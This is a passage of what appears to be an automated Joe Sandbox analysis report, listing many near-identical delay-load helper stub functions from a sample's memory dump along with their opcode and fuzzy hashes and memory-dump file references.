    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: FileType
    • String ID:
    • API String ID: 3081899298-0
    • Opcode ID: 2ffa19c8a6e5b39bcaa9af25c7f452cd755258127f40246df225d092ad241568
    • Instruction ID: 969d9bf1dcf66b136a1b65a35af78c962a207f990a6cf8cc92f94509d3600bce
    • Opcode Fuzzy Hash: 2ffa19c8a6e5b39bcaa9af25c7f452cd755258127f40246df225d092ad241568
    • Instruction Fuzzy Hash: 46C01275540105854EB00A2498480557663EB533657B497E5C068C90A2C3268C83E646
    Function 0005F31B Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F32D
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 78a273033397e87536ac2046efa0dcfd4eb3dbd883537461a52c848e73032447
    • Instruction ID: c9fd6419c3140497010b25d1e8bcfe4d7b96bc6d48801a57c8cddc5415172164
    • Opcode Fuzzy Hash: 78a273033397e87536ac2046efa0dcfd4eb3dbd883537461a52c848e73032447
    • Instruction Fuzzy Hash: 64B012852684037D335421507C06D3B022DD7C0B13370803FF803C4041E84C0D082032
    Function 0005F336 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F32D
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 98e9c25000c563140e382e5508bfe7d7079fb5c04db92f41e5a8441b33bb4e9e
    • Instruction ID: 4e93b351e17c2b107a857cc21e88900bcf8dbe5e8bf4e0c7cd565fea9eae6068
    • Opcode Fuzzy Hash: 98e9c25000c563140e382e5508bfe7d7079fb5c04db92f41e5a8441b33bb4e9e
    • Instruction Fuzzy Hash: 61B012853684037C33846158BD02E3B023DC7C4B13370823FF807C8041D88C0E092436
    Function 0005F340 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F32D
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: ab1294dcd3e15d10a9448e426bc72bb386c9b566923d55dd1c6025b1a0173fed
    • Instruction ID: 4f073b88b2366fbc49f2e06c50125ea4d859e0043bdb0b3a6c8c90d6084cd268
    • Opcode Fuzzy Hash: ab1294dcd3e15d10a9448e426bc72bb386c9b566923d55dd1c6025b1a0173fed
    • Instruction Fuzzy Hash: DFB012852785037C33846158BC02E3B023DD7C4B13370813FF807C4041D84C0D082836
    Function 0005F34A Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F32D
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 4aed6da03156619734833d76dc8a2b0cde815e4890726e43fcd23e7aa4caab57
    • Instruction ID: 1e5e45b4352eab4dc1cd50cf959b1b20df90eececb9b4ddf03dedfc2bc739123
    • Opcode Fuzzy Hash: 4aed6da03156619734833d76dc8a2b0cde815e4890726e43fcd23e7aa4caab57
    • Instruction Fuzzy Hash: D7B012892685037C338461547C02E3F022DC7C1B13330C03FFC07C4442D84C0D092032
    Function 0005F354 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F32D
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: c2ab19f628fa87b6be7da41f5843e5f9da2aab31c100497daf624934dd111e03
    • Instruction ID: ce45677bde6db3de6719f46a6030d6c922ceb6cccea77df7a7716179bda0dfb1
    • Opcode Fuzzy Hash: c2ab19f628fa87b6be7da41f5843e5f9da2aab31c100497daf624934dd111e03
    • Instruction Fuzzy Hash: 39B012892686037C37C461547C02E3B026DC7C0B13330813FF807C4441D84C0D486032
    Function 0005F368 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F32D
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 196475a01230ffc1821e5102f376502d11b02d89a27e766d2a8079f8409fa473
    • Instruction ID: 072936aeef1c47143789e1bb5c5478b67a7c5d304e4e5ad631a7eee128006313
    • Opcode Fuzzy Hash: 196475a01230ffc1821e5102f376502d11b02d89a27e766d2a8079f8409fa473
    • Instruction Fuzzy Hash: 4FB012892685037C338461547C02E3B022DD7C0B13370803FF807C4441D84C0D082132
    Function 0005F372 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F32D
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 789f642cb6549afbbc16e5dc76c782f3275c59bc6fff56373f594869cc4d85f3
    • Instruction ID: 730ac1bbe861e19d6707b2615931fa4f98c901f3987db0aeea9a3e3cb5f8a176
    • Opcode Fuzzy Hash: 789f642cb6549afbbc16e5dc76c782f3275c59bc6fff56373f594869cc4d85f3
    • Instruction Fuzzy Hash: E7B092852684036C338461546C02A3B0229C7C1B12330C02BB806C4142E84809092032
    Function 0005F37C Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F32D
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 3ace68feb84ebe064b1bef3fd5262b62c16547f6efdabe1774bcfc04e8582972
    • Instruction ID: 83eb2bc023156b673a25ee186bd3e886d75cc84d2d000256eb40ef53fa6d155b
    • Opcode Fuzzy Hash: 3ace68feb84ebe064b1bef3fd5262b62c16547f6efdabe1774bcfc04e8582972
    • Instruction Fuzzy Hash: BFB012852685037C33C461547C02E3B022DC7C0B13330C13FF807C4141E84C0D4C2032
    Function 0005F386 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F32D
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 0c05e8e9e12171f922270f4f8d982424987bf9325020cace071bebdb0f97efc1
    • Instruction ID: 9256fad8c18e32ec5923f3a72ee490704742e27aec56ed45949e44f5bd5abf09
    • Opcode Fuzzy Hash: 0c05e8e9e12171f922270f4f8d982424987bf9325020cace071bebdb0f97efc1
    • Instruction Fuzzy Hash: FEB012853A84037C338461547D02E3B022DC7C0B13330C03FF807C8141E89C0E0D2032
    Function 0005F390 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F32D
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: a9add3418e48bd0eab4f58b41043c5e853861d9c7107173fe1790dc05fae09bf
    • Instruction ID: 5cbf6886ef527cfbbec71b6d270b4b8f4c72f5641dfae21209ba42adc8491d94
    • Opcode Fuzzy Hash: a9add3418e48bd0eab4f58b41043c5e853861d9c7107173fe1790dc05fae09bf
    • Instruction Fuzzy Hash: 4AB012852684037C338461947C02E3B032DD7C0B13370C43FF807C4141E84C0D0C2032
    Function 0005F39A Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F32D
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 9b38546af2e02480f5dc41955789e5c1b3cb64f17df9b9f05dc6b34c9a6a062c
    • Instruction ID: 6987e942d37e245ea194748d08716da5cfd800b22f2dbf38a0c24a3995f1f3df
    • Opcode Fuzzy Hash: 9b38546af2e02480f5dc41955789e5c1b3cb64f17df9b9f05dc6b34c9a6a062c
    • Instruction Fuzzy Hash: 4CB092952684036C338461546C02A3B0229C781B12330802BB806C4042D8480A092032
    Function 0005F3AE Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F32D
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 50ee986a26bdb0b429bee76bf3515dbf57e4df58a6686e1a02fc6aecb98b0d8e
    • Instruction ID: 8c807d22f6112dd47e6ad8de3991495b3ed5eea8176d1b38d35cb6931952d74e
    • Opcode Fuzzy Hash: 50ee986a26bdb0b429bee76bf3515dbf57e4df58a6686e1a02fc6aecb98b0d8e
    • Instruction Fuzzy Hash: D9B092952684036C338461546D02A3B0229C780B12330802BB807C8041D8880A092032
    Function 0005F3B8 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F32D
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 57bdc4220e0a0bee308cef4b74ce90bbdcacfe96494dcea5fa9ee5424a2f02e6
    • Instruction ID: c5373e9216d3fc5633b73e9c52eac9c4223f304f6aafd11071a63ff298e3e688
    • Opcode Fuzzy Hash: 57bdc4220e0a0bee308cef4b74ce90bbdcacfe96494dcea5fa9ee5424a2f02e6
    • Instruction Fuzzy Hash: 30B012D52684037C338461557C02E3B023DD7C0B13370803FF807C8041D84C0E082032
    Function 0005F3CC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F32D
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: e7a580cb185b18976dbecfa7a1ccbc2068d8897dfb48973e1e538e09d84787df
    • Instruction ID: cdbf8abc7f282170388fd4d81779b7dcf395286702b077d296bb25140064832a
    • Opcode Fuzzy Hash: e7a580cb185b18976dbecfa7a1ccbc2068d8897dfb48973e1e538e09d84787df
    • Instruction Fuzzy Hash: C3B0129926A5037C33C462547C12E3B022EC7C0B23330813FF807C8041D84C0D482032
    Function 0005F3D6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F32D
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
